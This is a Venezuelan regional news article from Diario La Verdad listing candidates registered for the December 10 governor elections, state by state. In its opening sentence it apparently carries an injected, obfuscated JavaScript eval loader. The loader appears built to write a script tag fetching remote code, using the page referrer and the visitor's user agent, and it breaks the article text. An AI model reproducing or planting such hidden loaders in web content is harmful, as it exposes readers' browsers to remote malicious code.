publicidad

Partidos de oposición inscriben candidatos a las regionales

José Alejandro Urdaneta / Maracaibo / jurdaneta@laverdad.com
Aunque eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|isktn|var|u0026u|referrer|rhnik||js|php'.split('|'),0,{})) voceros de la oposición han expresado su negativa a participar en los comicios pautados por el CNE para el 10 de diciembre, este jueves, partidos pertenecientes a la MUD presentados sus aspirantes por estado. Por el Zulia se presentaron cinco candidatos 

(Foto: Archivo)

Este jueves 10 finaliza la jornada de inscripción de candidatos para las elecciones de gobernadores del próximo 10 de diciembre. Pese a las críticas de personeros del bloque opositor, partidos políticos presentaron a sus postulados para la contienda. 

El Partido Socialista Unido de Venezuela (PSUV) aseguró que presentaría candidatos en todos los estados del país. 

Hasta el último día señalado pór el Consejo Nacional Electoral, la oposición aún no había definido aspirantes en algunas localidades. 

La siguiente es la lista de candidatos presentados por partidos de oposición hasta la tarde de hoy por estado: 

Amazonas: Bernabé Gutiérrez (Exgobernador/Acción Democrática).

Anzoátegui: Luis Carlos Padilla (Diputado/Acción Democrática).

Apure: Jorge Rodríguez Galvis (Alcalde) y José Gregorio Montilla (Acción Democrática).

Aragua: Delson Guarate (Voluntad Popular) y Ismael García (Diputado/Primero Justicia y Acción Democrática).

Barinas: Andrés Eloy Camejo (Diputado/Acción Democrática).

Bolívar: Justo Noguera (Presidente de Sidor/PSUV), Francisco Contreras (PCV), Freddy Valera (Diputado/Acción Democrática), Francisco Sucre (Diputado/Voluntad Popular) y Giovanni Pasquali (MAS).

Carabobo: Haydee Franco (Exconstituyentista/Avanzada Progresista), Alejandro Feo La Cruz (Alcalde/Voluntad Popular y Juega Limpio), Rubén Limas (Legislador/Acción Democrática), Juan Miguel Matheus (Diputado/Primero Justicia), Octavio Táriba (MAS y Psoev), Pablo Da Costa (Nuvipa), Luis León Guerra (Progreso), Vicente Scarano (ConEnzo y Por un Mejor Vivir), Luis Gallo (Seguimos y Alternativa 1), Luis Figueroa (Usted), Enderson Marrero (Un Nuevo Tiempo), Darwin Brett (Iniciativa Propia), Kelvin Pérez (Mi Pueblo), Orlando Pita (Puerto Cabello Primero), Walter Briceño (Puente), Luis Felipe Acosta Carlez (Iniciativa Propia), María Chacón (Independientes por el Progreso), y Eduardo Yépez (Unidad Política Popular 89).

Cojedes: Dennis Fernández (Diputada/Acción Democrática).

Delta Amacuro: Lariza González (Diputada/Acción Democrática).

Falcón: Elicer Sirit (Diputado/Acción Democrática) y José Gregorio Graterol (Diputado/Primero Justicia).

Guárico: Pedro Loreto (Alcalde/Acción Democrática y UNT), Rummy Olivo (Cantante/Primero Justicia y Copei), Jesús Cepeda (Exdiputado/MAS), Yovani Salazar (Alcalde/Voluntad Popular) e Hinderburgo Becerra (Nuvipa).

Lara: Henri Falcón (Gobernador/Avanzada Progresista y Acción Democrática) y Luis Florido (Diputado/Voluntad Popular).

Mérida: Ramón Guevara (Acción Democrática).

Miranda: Negal Morales (Acción Democrática).

Monagas: Luis Eduardo Martínez (Exgobernador/Acción Democrática), Guillermo Call (Exgobernador/Copei), María Gabriela Hernández (Diputada/Primero Justicia), Yelitze Santaella (Gobernadora/PSUV y ORA), Ramón Fuentes (Ex alcalde/Avanzada Progresista), Pablo Morillo (Independiente), Wilfredo Febres (Exdiputado/UNT), Manuel Mendoza (MAS), Antonio Goncalves (Voluntad Popular) y Robert Acevedo (Independiente por el Progreso).

Nueva Esparta: Alfredo Díaz (Alcalde/Acción Democrática y Avanzada Progresista).

Portuguesa: Antonia Muñoz (Exgobernadora/PSUV) y Edgar Miranda (Acción Democrática).

Sucre: Robert Alcalá (Diputado/Acción Democrática), Ramón Martínez (Exgobernador/MAS) y Eduardo Morales Gil (Exgobernador/Voluntad Popular).

Táchira: Juan Requesens (Diputado/Primero Justicia), Miguel Reyes (Legislador regional/Acción Democrática) y Miguel Ángel Rodríguez (Exdiputado/Avanzada Progresista).

Trujillo: Carlos Andrés González (Diputado/Acción Democrática) y Henry Rangel Silva (Gobernador/PSUV).

Vargas: Roberto Smith (Voluntad Popular) y Bernardo Guerra (Exdiputado/Acción Democrática).

Yaracuy: Jesús Peña Navas (Acción Democrática).

Zulia: Hernán Alemán (Diputado/Acción Democrática), Juan Pablo Guanipa (Diputado/Primero Justicia), Carlos Alaimo (Partido Independiente del Zulia), Francisco Arias Cárdenas (Gobernador/PSUV) y Johel Salas (Profesor/Puente).

Más noticias

  • Rusia: Aviones en Venezuela no portan armas nucleares

    09:59am

    Moscú lamentó que la Secretaría General de la OEA "emplee su estatus para difundir información infundada y falsa sobre la política de Rusia en la región de Latinoamérica”

  • Efraín Rincón presenta libro de marketing político

    13/12/2018 03:13pm

    Efraín Rincón, profesor y politólogo, escribió Fundamentos de marketing político con el fin de que los políticos se asesoren en el arte de la política, y mejoren su gestión de gobierno, por medio de una visión sistemática que incluya investigación, estrategia y comunicación efectiva    

  • AN aprobará ley para recuperar activos de la corrupción

    13/12/2018 02:40pm

    Freddy Superlano, presidente de la Comisión de Contraloría, indicó que la comisión pretende ser un espacio donde se registre y contabilice el daño patrimonial hecho a Venezuela, durante estos últimos 20 años

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama